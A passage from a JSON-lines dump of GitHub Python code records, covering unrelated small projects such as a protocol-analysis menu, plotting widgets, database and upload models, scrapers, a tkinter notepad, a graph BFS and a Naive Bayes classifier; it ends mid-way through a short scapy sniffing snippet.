seekers.complexSeeker.all import *\n\ndef complexSeeker_menu(symbol_selector,symbols):\n\n\n print('\\033[34m' + \"Available relation seekers:\" + '\\033[0m' + '\\n')\n print('\\033[32m' + \"[1] \" + '\\033[0m' + '\\033[34m' + \"[Seek for an IP field]\" + '\\033[0m' + '\\n')\n print('\\033[32m' + \"[2] \" + '\\033[0m' + '\\033[34m' + \"[Seek for CRC32 relation]\" + '\\033[0m' + '\\n')\n print('\\033[32m' + \"[3] \" + '\\033[0m' + '\\033[34m' + \"[Separate header fields and data fields]\" + '\\033[0m' + '\\n')\n print('\\033[32m' + \"[4] \" + '\\033[0m' + '\\033[34m' + \"[Seek a size relation between two fields]\" + '\\033[0m' + '\\n')\n print('\\033[32m' + \"[B] \" + '\\033[0m' + '\\033[34m' + \"[Go back to previous menu]\" + '\\033[0m' + '\\n')\n\n seeker_selector = input(\" PLEASE SELECT A CHOICE >>> \")\n complexSeeker_menu_choice(seeker_selector, symbols, symbol_selector)\n\ndef complexSeeker_menu_choice(seeker_selector,symbols,symbol_selector):\n\n if (seeker_selector == \"1\"):\n click.echo(click.style(\"SEARCH FOR IPS\\n\", fg=\"yellow\"))\n metaseeker_menu(symbol_selector, symbols)\n elif (seeker_selector == \"2\"):\n click.echo(click.style(\"SEARCH FOR CRC32\\n\", fg=\"yellow\"))\n crcSeeker_menu(symbol_selector, symbols)\n elif (seeker_selector == \"3\"):\n click.echo(click.style(\"SEARCH FOR HEADER AND DATA FIELDS\\n\", fg=\"yellow\"))\n headerSeeker_menu(symbols)\n elif (seeker_selector == \"4\"):\n click.echo(click.style(\"SEARCH FOR SIZE\\n\", fg=\"yellow\"))\n sizeSeeker_menu(symbol_selector,symbols)\n elif (seeker_selector == \"B\"):\n click.echo(click.style(\"BACK TO PREVIOUS MENU\\n\", fg=\"yellow\"))\n manipulate_menu(symbols)\n else:\n click.echo(click.style(\"ERROR : WRONG SELECTION\\n\", fg=\"yellow\"))\n complexSeeker_menu(symbol_selector,symbols)","repo_name":"conix-security/TAPIRE","sub_path":"menus/complexSeekersmenu.py","file_name":"complexSeekersmenu.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"2801033475","text":"from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\n\nfrom PyQt5.QtWidgets import QSizePolicy\n\n\nclass Graph(FigureCanvas):\n def __init__(self, parent=None, width=5, height=4, dpi=100):\n fig = Figure(figsize=(width, height), dpi=dpi)\n self.axes = fig.add_subplot(111)\n\n FigureCanvas.__init__(self, fig)\n self.setParent(parent)\n\n FigureCanvas.setSizePolicy(self,\n QSizePolicy.Expanding,\n QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n plt.ion()\n\n self.max_number = 100\n self.numbers = []\n self.plot()\n\n def plot(self):\n self.ax = self.figure.add_subplot(111)\n self.ax.yaxis.set_major_locator(MaxNLocator(nbins=1, integer=True))\n self.figure.canvas.draw()\n\n\nclass DotGraph(Graph):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.line = {}\n\n def addvalue(self, value=None):\n if value is not None:\n self.numbers.append(value)\n if value not in self.line:\n self.line[value] = 0\n self.line[value] += 1\n freq = [self.line[i] for i in self.numbers]\n self.ax.plot(self.numbers, freq, \".\")\n self.figure.canvas.draw()\n\n\nclass LineGraph(Graph):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.line = [0 for i in range(1, self.max_number + 1)]\n\n def addvalue(self, value=None):\n if value is not None:\n if value == 0:\n value = 100\n self.line[value-1] += 1\n self.numbers.append(value)\n self.ax.clear()\n self.ax.plot(self.line)\n self.figure.canvas.draw()\n","repo_name":"Minorias/pds_lavalamp","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"18319511755","text":"import MySQLdb\nimport peewee\n\n\ndef dictfetchall(cursor):\n \"\"\"Return all rows from a cursor as a dict\"\"\"\n columns = [col[0] for col in cursor.description]\n return [\n dict(zip(columns, row))\n for row in cursor.fetchall()\n ]\n\n\ndb = MySQLdb.connect(host='localhost', user='dbuser', db='imdb', connect_timeout=5, charset='utf8')\ncursor = db.cursor() # represent a database cursor, which is used to manage the context of fetch operation\ncursor.execute(\"SELECT VERSION()\")\ndata = cursor.fetchone()\nprint(\"Database version: \", data)\ncursor.execute('SELECT * FROM Reviewer')\nprint(dictfetchall(cursor))\ncursor.close()\ndb.close()\n\n\ndef query(self, sql):\n try:\n self.conn.ping()\n except:\n self.connect()\n with closing(self.conn.cursor()) as cursor:\n cursor.execute(sql)\n return self.dictfetchall(cursor)","repo_name":"adwiza/py-adv","sub_path":"less-10-authomatization.py","file_name":"less-10-authomatization.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73282558532","text":"import numpy as np\nimport cv2\nimport mediapipe as mp\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_face_mesh = mp.solutions.face_mesh\n\nleft_eye = [i[1] for i in mp.solutions.face_mesh.FACEMESH_LEFT_EYE]\nright_eye = [i[0] for i in mp.solutions.face_mesh.FACEMESH_RIGHT_EYE]\n\ndef draw(image, results):\n annotated_image = image.copy()\n for face_landmarks in results.multi_face_landmarks:\n #print('face_landmarks:', face_landmarks)\n mp_drawing.draw_landmarks(\n image=annotated_image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_TESSELATION,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_tesselation_style())\n mp_drawing.draw_landmarks(\n image=annotated_image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_CONTOURS,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_contours_style())\n mp_drawing.draw_landmarks(\n image=annotated_image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_IRISES,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_iris_connections_style())\n return annotated_image\n\n\ndef compute_w_ratio(results):\n p_lefteye, p_righteye, p_left, p_right = get_points(results)\n return np.linalg.norm(p_lefteye - p_righteye) / np.linalg.norm(p_left - p_right)\n\ndef get_points(results):\n landmarks = results.multi_face_landmarks[0]\n p_lefteye = mean([landmarks.landmark[i] for i in left_eye])\n p_righteye = mean([landmarks.landmark[i] for i in right_eye])\n p_left = to_array(landmarks.landmark[356])\n p_right = to_array(landmarks.landmark[127])\n return p_lefteye, p_righteye, p_left, p_right\n\ndef to_array(p):\n return np.array([p.x, p.y, p.z])\n\ndef mean(points):\n return np.mean(np.array([to_array(p) for p in points]), axis=0)\n\n\n############ thurstone\nfrom scipy.special import ndtri, ndtr\nfrom scipy.optimize import least_squares\n\n\ndef make_countmatrix(data, school2idx):\n A = np.zeros((len(school2idx), len(school2idx)))\n for s1, s2 in data.index:\n A[school2idx[s1], school2idx[s2]] += 1\n return A\n\ndef sort_schools(A, school2idx, axis=0):\n schools_sorted = [list(school2idx)[idx] for idx in np.argsort(A.sum(axis=axis))]\n # list(reversed(schools_sorted))\n return schools_sorted\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\ndef logit(y):\n return -np.log((1 - y) / y)\n\ndef compute_p(data):\n return (data.win1 + 1) / (data.win1 + data.win2 + 2)\n\ndef compute_mu(data, F=ndtri):\n mu = {}\n for (s1, s2), p in compute_p(data).items():\n if s2 == schools_sorted[-1]:\n mu[s1] = F(p)\n return mu\n\ndef to_np(d):\n return np.array([d[city] for city in schools_sorted[:-1]])\n\ndef cost(schools_sorted, p, mu):\n N = len(mu)\n mu_1 = {schools_sorted[i]: mu[i] for i in range(N)}\n mu_1[schools_sorted[-1]] = 0\n return np.array([(v - ndtr(mu_1[s1] - mu_1[s2]))**2 for (s1, s2), v in p.items()])","repo_name":"Lapu-Lapu/structural_beauty","sub_path":"notebooks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5872585858","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom pathlib import Path\nimport urllib\nimport time\n\n# 웹 페이지를 구해 해석한다\nload_url = \"https://www.epicurious.com/expert-advice/how-to-swirl-peanut-butter-on-brownies\"\nhtml = requests.get(load_url)\nsoup = BeautifulSoup(html.content, \"html.parser\")\nprint(html)\n# 저장용 폴더를 만든다.\nout_folder = Path(\"download3\")\nout_folder.mkdir(exist_ok=True)\n\n# 모든 img 태그를 검색해 링크를 구한다.\nfor element in soup.find_all(\"img\"):\n src = element.get(\"src\")\n print(src)\n # 절대 URL을 만들어 이미지 데이터를 구한다.\n image_url = urllib.parse.urljoin(load_url, src)\n imgdata = requests.get(image_url)\n\n # URL에서 마지막에 있는 파일명을 추출하고 저장 폴더명과 연결한다.\n filename = image_url.split(\"/\")[-1]\n out_path = out_folder.joinpath(filename)\n\n # 이미지 데이터를 파일에 쓴다\n with open(out_path, mode=\"wb\") as f:\n f.write(imgdata.content)\n \n # 한번 엑세스했으므로 1초 기다린다.\n time.sleep(1)\n\n\n\n\n\n","repo_name":"yipf1123/Study","sub_path":"Book Transcription/Python/Python 2학년 스크래핑의 구조/ch02_HTML을 해석해 보자/ch02-14 copy.py","file_name":"ch02-14 copy.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"724482598","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import filedialog\n\nroot = Tk()\nroot.title(\"Блокнот\")\nroot.resizable(True, True)\nroot.geometry('400x400+0+0')\n\nmain_menu = Menu(root)\nroot.config(menu=main_menu)\n\ndef about_program():\n messagebox.showinfo(\"Блокнот\", \"Версия программы - 0.0.0\")\n\ndef quit_program():\n answer = messagebox.askokcancel(\"Выход\", \"Вы действительно решили выйти из этого чудо-блокнота?\")\n if answer:\n root.destroy()\n\ndef change_theme(theme):\n t['bg'] = theme_colors[theme]['text_bg']\n t['fg'] = theme_colors[theme]['text_fg']\n t['insertbackground'] = theme_colors[theme]['cursor']\n t['selectbackground'] = theme_colors[theme]['select_bg']\n\ndef open_file():\n file_path = filedialog.askopenfilename(title = \"Выбор файла\", filetypes = ((\"текстовые документы (*.txt)\",\"*.txt\"),(\"Все файлы\",\"*.*\")))\n if file_path:\n t.delete('1.0', END)\n t.insert('1.0', open(file_path, encoding='utf-8').read())\n\ndef save_file():\n file_path = filedialog.asksaveasfilename(title = \"Выбор файла\", filetypes = ((\"текстовые документы (*.txt)\",\"*.txt\"),(\"Все файлы\",\"*.*\")))\n f = open(file_path, 'w', encoding='utf-8')\n text = t.get('1.0', END)\n f.write(text)\n f.close()\n\nfile_menu = Menu(main_menu, tearoff=0)\nmain_menu.add_cascade(label = \"Файл\", menu=file_menu)\nfile_menu.add_command(label = \"Открыть\", command=open_file)\nfile_menu.add_command(label = \"Сохранить\", command=save_file)\nfile_menu.add_separator()\nfile_menu.add_command(label = \"Выход\", command=quit_program)\n\ntheme_menu = Menu(main_menu, tearoff=0)\nmain_menu.add_cascade(label=\"Разное\", menu=theme_menu)\ntheme_menu_sub = Menu(theme_menu, tearoff=0)\ntheme_menu.add_cascade(label = \"Оформление\", menu=theme_menu_sub)\ntheme_menu_sub.add_command(label = \"Light Theme\", command=lambda: change_theme('light'))\ntheme_menu_sub.add_command(label = \"Dark Theme\", command=lambda: change_theme('dark'))\ntheme_menu.add_command(label = \"О программе\", command=about_program)\n\n\n\ntheme_menu_sub = Menu(theme_menu, tearoff=0)\n\n# theme_menu_sub.add_command(label=\"Онлайн\")\n# theme_menu_sub.add_command(label=\"Оффлайн\")\n\nf_text = Frame(root)\nf_text.pack(fill=BOTH, expand=1)\n\ntheme_colors = {\n \"dark\" : {\n 'text_bg' : '#343D46', 'text_fg' : '#C6DEC1', 'cursor' : '#EDA756', 'select_bg' : '#4E5a65'\n },\n \"light\" : {\n 'text_bg' : '#fff', 'text_fg' : '#000', 'cursor' : '#8000FF', 'select_bg' : '#777'\n }\n}\n\nt = Text(f_text, font = \"Tahoma 12\", bg = theme_colors['dark']['text_bg'], fg = theme_colors['dark']['text_fg'], padx = 10, pady = 10, wrap = WORD, insertbackground = theme_colors['dark']['cursor'], selectbackground = theme_colors['dark']['select_bg'], width=0, spacing3=10)\nt.pack(fill=X,expand=1, side=LEFT)\n\n\nscroll = Scrollbar(f_text,command=t.yview)\nscroll.pack(fill=Y,side=LEFT)\nt.config(yscrollcommand = scroll.set)\n\n\nroot.mainloop()","repo_name":"BondarenkoAleksey/Python","sub_path":"notepad.py","file_name":"notepad.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42023764764","text":"\"\"\"Upload models.\"\"\"\nimport os\nimport uuid\nfrom typing import Optional\nfrom datetime import datetime\nfrom werkzeug.utils import secure_filename\nfrom werkzeug.datastructures import FileStorage\nfrom flask import current_app as app\nfrom flask_babel import lazy_gettext as _\n\nfrom app.database import DBItem, db, UUID, IntEnum\nfrom app.utils.enums import StringEnum\nfrom app.utils.image import Img\n\n\n# DB strings lengths\nMAX_NAME_LEN = 32\nMAX_DESCRIPTION_LEN = 1024\nMAX_PATH_LEN = 256\n\n\nclass UploadType(StringEnum):\n \"\"\"Upload file types.\"\"\"\n OTHER = _(\"Other\")\n PHOTO = _(\"Photo\")\n HISTORICAL_PHOTO = _(\"Historical photo\")\n MAP = _(\"Map\")\n ARTICLE = _(\"Article\")\n BOOK = _(\"Book\")\n DOCUMENT = _(\"Document\")\n\n\nclass Upload(DBItem):\n \"\"\"Uploads model.\n\n The uploaded file is stored in a selected folder with in a UUID.extension\n format. This way the filename conflicts are reduced.\n \"\"\"\n name = db.Column(db.String(MAX_NAME_LEN), nullable=False)\n description = db.Column(db.String(MAX_DESCRIPTION_LEN))\n type = db.Column(IntEnum(UploadType), nullable=False)\n path = db.Column(db.String(MAX_PATH_LEN), nullable=False)\n created = db.Column(db.DateTime(), default=datetime.utcnow, nullable=False)\n\n # Object UUID that is related to this file\n object_uuid = db.Column(UUID, index=True)\n created_by_id = db.Column(db.Integer, db.ForeignKey('user.id'),\n nullable=False)\n created_by = db.relationship('User')\n\n def _delete_file(self):\n \"\"\"Deletes files related to this object.\"\"\"\n delete_file(self.path)\n delete_file(self.thumbnail)\n\n def _make_thumbnail(self):\n \"\"\"Creates thumbnail.\"\"\"\n dest = get_full_path(self.thumbnail)\n img = Img(get_full_path(self.path))\n img.thumbnail(dest, app.config['THUMBNAIL_SIZE_PX'])\n\n def _save_file(self, file: FileStorage, subfolder: str):\n \"\"\"Stores file to uploads dir, resize if needed\n\n Args:\n file: Uploaded file handle\n subfolder: Subfolder under uploads dir to write to\n \"\"\"\n is_img = self.type in (UploadType.PHOTO, UploadType.HISTORICAL_PHOTO)\n self.path = save_uploaded_file(file, subfolder, str(uuid.uuid4()),\n is_img)\n if is_img:\n self._make_thumbnail()\n\n def delete(self):\n \"\"\"Deletes file from drive and database.\"\"\"\n self._delete_file()\n super().delete()\n\n def replace(self, file: FileStorage):\n \"\"\"Replaces the file related to this upload with a new one.\n\n Args:\n file: Uploaded file handle\n \"\"\"\n self._delete_file()\n subfolder = os.path.dirname(self.path)\n self._save_file(file, subfolder)\n\n @classmethod\n def create(cls, file: FileStorage, subfolder: str, # type: ignore\n *args, **kwargs):\n \"\"\"Create a new DB record and stores uploaded file to selected folder\n\n Args:\n file: Uploaded file handle\n subfolder: Folder relative to uploads folder to save data to\n \"\"\"\n # pylint: disable=arguments-differ\n obj = super().create(path='', *args, **kwargs)\n obj._save_file(file, subfolder)\n return obj\n\n @classmethod\n def get(cls, upload_type: UploadType):\n \"\"\"Gets query for all uploads of givent type\n\n Args:\n upload_type: Type to query for\n \"\"\"\n return cls.query.filter(cls.type == upload_type)\n\n @property\n def thumbnail(self):\n \"\"\"Returns relative path to thumbnail\"\"\"\n img_dir, name = os.path.split(self.path)\n return os.path.join(img_dir, 'thumbnail', name)\n\n\ndef get_full_path(path: str) -> str:\n \"\"\"Gets full path to an uploaded file.\n\n Args:\n path: Relative path to file (from uploads folder)\n Returns:\n Full path to file\n \"\"\"\n directory = os.path.join(app.instance_path, app.config['UPLOAD_DIR'])\n return os.path.join(directory, path)\n\n\ndef delete_file(path: Optional[str]):\n \"\"\"Removes file from the uploads dir (if exists)\n\n Args:\n path: Relative path to file\n \"\"\"\n if not path:\n return\n filename = get_full_path(path)\n if os.path.exists(filename):\n os.unlink(filename)\n\n\ndef save_uploaded_file(file, subfolder: str, filename: str,\n reduce: bool = False) -> str:\n \"\"\"Saves uploaded file to filesystem directly without DB entry.\n\n Args:\n file: Opened file handle\n subfolder: Folder under uploads directory to store file to\n filename: Name to save the file as. File extension is added if not set\n reduce: Assume file is image, reduce it's size before saving\n Returns:\n str: Path to the file under upload dir\n \"\"\"\n filename = secure_filename(filename)\n\n extension = os.path.splitext(file.filename)[1]\n given_extension = os.path.splitext(filename)[1]\n if extension != given_extension:\n filename += extension\n\n directory = get_full_path(subfolder)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n full_path = os.path.join(directory, filename)\n if reduce:\n img = Img(file)\n img.thumbnail(full_path, app.config['IMAGE_MAX_SIZE_PX'])\n else:\n file.save(full_path)\n return os.path.join(subfolder, filename)\n","repo_name":"kajusK/HiddenPlaces","sub_path":"app/models/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39189806730","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError\n\nclass ResUsers(models.Model):\n _inherit = 'res.users'\n\n left_amount = fields.Float(compute='_compute_amount', store=True, string=u'账户余额')\n to_add_amount = fields.Float(compute='_compute_amount', store=True, string=u'待入账金额')\n to_cash_amount = fields.Float(compute='_compute_amount', store=True, string=u'提现中金额')\n\n owner_account = fields.Boolean(search='_owner_account', store=False)\n\n shop_ids = fields.One2many('amazon.shop', 'operator_id', string=u'亚马逊店铺')\n transaction_details = fields.One2many('transaction.detail', 'merchant_id')\n\n @api.model\n def _owner_account(self, operation, value):\n if self.user_has_groups('b2b_platform.b2b_shop_operator') or \\\n self.user_has_groups('b2b_platform.b2b_seller'):\n merchant = self.env.user.merchant_id or self.env.user\n return [('id', '=', merchant.id)]\n else:\n users = self.env['res.users'].search([\n '|',\n ('user_type', '=', 'merchant'),\n ('id', '=', 1),\n ])\n return [('id', 'in', users.ids)]\n\n @api.multi\n @api.depends('transaction_details.state')\n def _compute_amount(self):\n # print 'compute account amount'\n for record in self:\n left_amount = 0\n to_add_amount = 0\n to_cash_amount = 0\n for detail in record.transaction_details:\n if detail.state == 'draft':\n if detail.type in ['cash']:\n to_cash_amount += detail.amount\n elif detail.type in ['supplier_invoice', 'charge', 'submitted_appeal']:\n to_add_amount += detail.amount\n elif detail.state == 'done':\n if detail.type in ['distributor_invoice', 'cash', 'received_appeal']:\n left_amount -= detail.amount\n elif detail.type in ['supplier_invoice', 'charge', 'submitted_appeal']:\n left_amount += detail.amount\n record.to_add_amount = to_add_amount\n record.to_cash_amount = to_cash_amount\n record.left_amount = left_amount - to_cash_amount\n if record.left_amount < 0:\n raise UserError(u'账户余额不足!')\n\n @api.multi\n def pass_audit(self):\n '''审核通过'''\n self.ensure_one()\n self.write({\n 'groups_id': [(6, False, [self.env.ref('b2b_platform.b2b_seller').id])],\n 'audit_state': 'pass',\n })\n #创建供应商库位\n location_obj = self.env['stock.location']\n partner_id = self.partner_id.id\n location_id = self.env.ref('b2b_platform.supplier_stock').id\n location = location_obj.search([('partner_id', '=', partner_id), ('location_id', '=', location_id)])\n if not location:\n location_obj.create({\n 'name': self.name,\n 'location_id': location_id,\n 'partner_id': partner_id,\n })\n\n @api.multi\n def view_transaction_detail(self):\n self.ensure_one()\n merchant = self.merchant_id or self\n return {\n 'name': u'交易明细',\n 'type': 'ir.actions.act_window',\n 'res_model': 'transaction.detail',\n 'view_mode': 'tree,',\n 'view_type': 'form',\n 'views': [\n (self.env.ref('amazon_api.transaction_detail_tree').id, 'tree')],\n 'domain': [('merchant_id', '=', merchant.id)],\n 'target': 'current',\n }\n","repo_name":"ljp1992/HZMX","sub_path":"amazon_api/models/res_users.py","file_name":"res_users.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"37170213824","text":"import unittest\nfrom AirportAtlas import AirportAtlas \n\n\nclass AtlasDistanceTest(unittest.TestCase):\n\n def setUp(self):\n print (\"Before the Test\")\n\n self.known_values = ((53.34, 6.2), (53.34, 6.2)) #####Coordinates of Dublin.\n self.testAtlas = AirportAtlas(\"airport.csv\")\n\n \n def test_getDistBetween_known_values(self):\n code1 = self.known_values[0]\n code2 = self.known_values[1]\n \n result = self.testAtlas.getDistance(code1, code2)\n self.assertEqual(0, result) ######Distance fro Dublin to Dublin should be zero\n\n def tearDown(self):\n print (\"After the Test\")\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"BennyMurray/Fuel-o-Tron","sub_path":"Testing/TEST - AirportAtlas.py","file_name":"TEST - AirportAtlas.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11280862958","text":"import sys\nfrom collections import deque \n\ndef distance(adj, s, t):\n dist=[ 'inf' for _ in (adj)]\n #print('dist',dist)\n q=deque([s])\n dist[s]=0\n #print(dist)\n while len(q)!=0:\n u=q.popleft()\n #print(u)\n #print(q)\n for i in adj[u]:\n if dist[i]=='inf':\n q.append(i)\n dist[i]=dist[u]+1\n if dist[t] == 'inf':\n return -1\n return dist[t]\n\nif __name__ == '__main__':\n #data=[4,4,1,2,4,1,2,3,3,1,2,4]\n #data=[5,4,5,2,1,3,3,4,1,4,3,5]\n input = sys.stdin.read()\n data = list(map(int, input.split()))\n n, m = data[0:2]\n data = data[2:]\n edges = list(zip(data[0:(2 * m):2], data[1:(2 * m):2]))\n adj = [[] for _ in range(n)]\n for (a, b) in edges:\n adj[a - 1].append(b - 1)\n adj[b - 1].append(a - 1)\n s, t = data[2 * m] - 1, data[2 * m + 1] - 1\n #print(edges)\n #print(adj)\n #print(s,t)\n print(distance(adj, s, t))\n","repo_name":"chrisxxdvocatus/algorithms_on_graphs","sub_path":"w3.py","file_name":"w3.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43316129448","text":"import os\r\nimport time\r\nfrom selenium.webdriver.chrome.options import Options # 选项功能\r\nimport requests\r\nfrom selenium.webdriver.chrome.service import Service\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nheaders ={\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'\r\n}\r\n#url = 'https://www.instagram.com/p/CtTmD-AObNp/?igshid=MzRlODBiNWFlZA%3D%3D'\r\n\"\"\" PLEASE PASTE YOUR LINK HERE!!! \"\"\"\r\nurl = 'paste your link here!!!' # paste your link here!!!\r\n\r\ndef get_next(): #get next page\r\n button = driver.find_element(By.XPATH, '//div[@class=\" _9zm2\"]')\r\n driver.execute_script(\"arguments[0].click();\", button)\r\n time.sleep(1)\r\n\r\ndef get_first_page(): #get the information of first page\r\n url = driver.find_element(By.XPATH, '//*[@class=\"_acay\"]/li[2]/div/div/div/div/div/img').get_attribute('src')\r\n return url\r\n time.sleep(2)\r\n\r\ndef get_other_pages(): #get the information of other pages\r\n url_2 = driver.find_element(By.XPATH, '//*[@class=\"_acay\"]/li[3]/div/div/div/div/div/img').get_attribute('src')\r\n return url_2\r\n\r\nif __name__ == '__main__':\r\n if not os.path.exists('ins-img'): #���果当前路径没有存放图片的文件夹,则创建一个\r\n os.mkdir('ins-img')\r\n \"\"\"添加无头模式,免开浏览器\"\"\"\r\n chrome_options = Options()\r\n chrome_options.add_argument('--headless')\r\n\r\n service = Service('chromedriver.exe')\r\n driver = webdriver.Chrome(service=service, options=chrome_options)\r\n driver.get(url)\r\n #driver.maximize_window()\r\n driver.implicitly_wait(20)\r\n time.sleep(5)\r\n\r\n #pic_url = driver.find_element(By.XPATH, '//*[@class=\"_acay\"]/li[2]/div/div/div/div/div/img').get_attribute('src')\r\n pic_url = get_first_page()\r\n print(pic_url)\r\n pic_url_list = pic_url.split('/')\r\n pic_url_list_1 = pic_url_list[5].split('?')[0] #获取jpg文件名\r\n print(pic_url_list_1)\r\n response = requests.get(url = pic_url, headers=headers)\r\n with open(f'ins-img/{pic_url_list_1}.jpg', mode='wb') as f:\r\n f.write(response.content)\r\n print('已经下载完成第1张')\r\n #\r\n #用while True 遍历所有\"下一页\",当到最后一页时,会报错,此时使用try-except用break 即可.\r\n while True:\r\n try:\r\n # for i in range(2,8):\r\n get_next()\r\n pic_url_other = get_other_pages()\r\n print(pic_url_other)\r\n other_url_list = pic_url_other.split('/')\r\n other_url_list_1 = other_url_list[5].split('?')[0]\r\n response = requests.get(url=pic_url_other, headers=headers)\r\n with open(f'ins-img/{other_url_list_1}.jpg', mode='wb') as f:\r\n f.write(response.content)\r\n print(f'已经下载完成{other_url_list_1}')\r\n\r\n except Exception as e:\r\n print(e)\r\n break\r\n\r\n\r\n\r\n print('=====下载完成=====')\r\n driver.quit()\r\n","repo_name":"fanyiang92/download-instagram-photos","sub_path":"insdownload.py","file_name":"insdownload.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22152925674","text":"#WAP to input three digit number and print its reverse\n\nno = int(input(\"Enter 3 Digit Number :\")) #276 -> 27 -> 2\n\nrem=no%10 #6\nrev=rem\nno=no//10\n\nrem=no%10 #7\nrev=rev*10+rem\nno=no//10\n\nrem=no%10 #2\nrev=rev*10+rem\n\nprint(\"Reverse = \",rev)\n\n\n","repo_name":"shrenik77130/Repo5Batch22PythonWeb","sub_path":"#3_Python_Complex_Programs/Program15.py","file_name":"Program15.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35753444702","text":"\nimport numpy as np\nfrom sklearn.datasets import load_iris\n\n# Load the dataset\niris = load_iris()\n\n# Print the features and target variable\nprint(\"Features: \", iris.feature_names)\nprint(\"Target variable: \", iris.target_names)\n\n# X = np.array(iris.data)\n# y = np.array(iris.target)\n\n# display data point and class\n# print(X)\n# print(y)\n\n\n# implementation with sklearn library Naive Bayes\nfrom sklearn.naive_bayes import GaussianNB\n\ndef classify_iris(sepal_length, sepal_width, petal_length, petal_width):\n # Load the IRIS dataset\n iris = load_iris()\n\n # Create a Gaussian Naive Bayes classifier\n clf = GaussianNB()\n\n # Train the classifier on the IRIS dataset\n clf.fit(iris.data, iris.target)\n\n # Create a feature vector for the new flower\n new_flower = [[sepal_length, sepal_width, petal_length, petal_width]]\n\n # Use the trained classifier to predict the class of the new flower\n predicted_class = clf.predict(new_flower)\n\n # Convert the predicted class index to the corresponding class name\n class_names = iris.target_names.tolist()\n predicted_class_name = class_names[predicted_class[0]]\n\n return predicted_class_name\n\npredicted_class = classify_iris(8.1, 2.5, 2.4, 0.2)\nprint(f'prediction with sklearn(class): {predicted_class}')\n\n\n\n# implementation with only NUMPY \ndef classify_iris_np(sepal_length, sepal_width, petal_length, petal_width):\n # Load the IRIS dataset\n iris = load_iris()\n\n # Split the dataset into features and labels\n X = iris.data\n y = iris.target\n\n # Compute the mean and variance of each feature for each class\n class_means = [np.mean(X[y == i], axis=0) for i in range(3)]\n class_variances = [np.var(X[y == i], axis=0) for i in range(3)]\n\n # Compute the class priors\n class_priors = np.bincount(y) / len(y)\n\n # Compute the likelihoods for each feature of the test example\n likelihoods = [[np.exp(-(x - mean)**2 / (2 * variance)) / np.sqrt(2 * np.pi * variance)\n for x, mean, variance in zip([sepal_length, sepal_width, petal_length, petal_width], class_means[i], class_variances[i])]\n for i in range(3)]\n\n # Compute the joint probabilities for each class\n joint_probabilities = np.prod(likelihoods, axis=1) * class_priors\n\n # Normalize the joint probabilities to get the posterior probabilities\n posterior_probabilities = joint_probabilities / np.sum(joint_probabilities)\n\n # Return the class with the highest posterior probability\n predicted_class_index = np.argmax(posterior_probabilities)\n predicted_class_name = iris.target_names[predicted_class_index]\n\n return predicted_class_name\n\npredicted_class_np = classify_iris_np(8.1, 2.5, 2.4, 0.2)\nprint(f'prediction with only np(class): {predicted_class_np}')\n","repo_name":"mikiya09/DataSci","sub_path":"ml/algorithms/NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"27822377830","text":"from scapy.all import *\r\n\r\n\r\ndef http_header(packet):\r\n http_packet = str(packet)\r\n if http_packet.find('POST /result HTTP/1.1'):\r\n return True\r\n\r\n\r\nt = sniff(count=1, prn=http_header, filter='tcp port 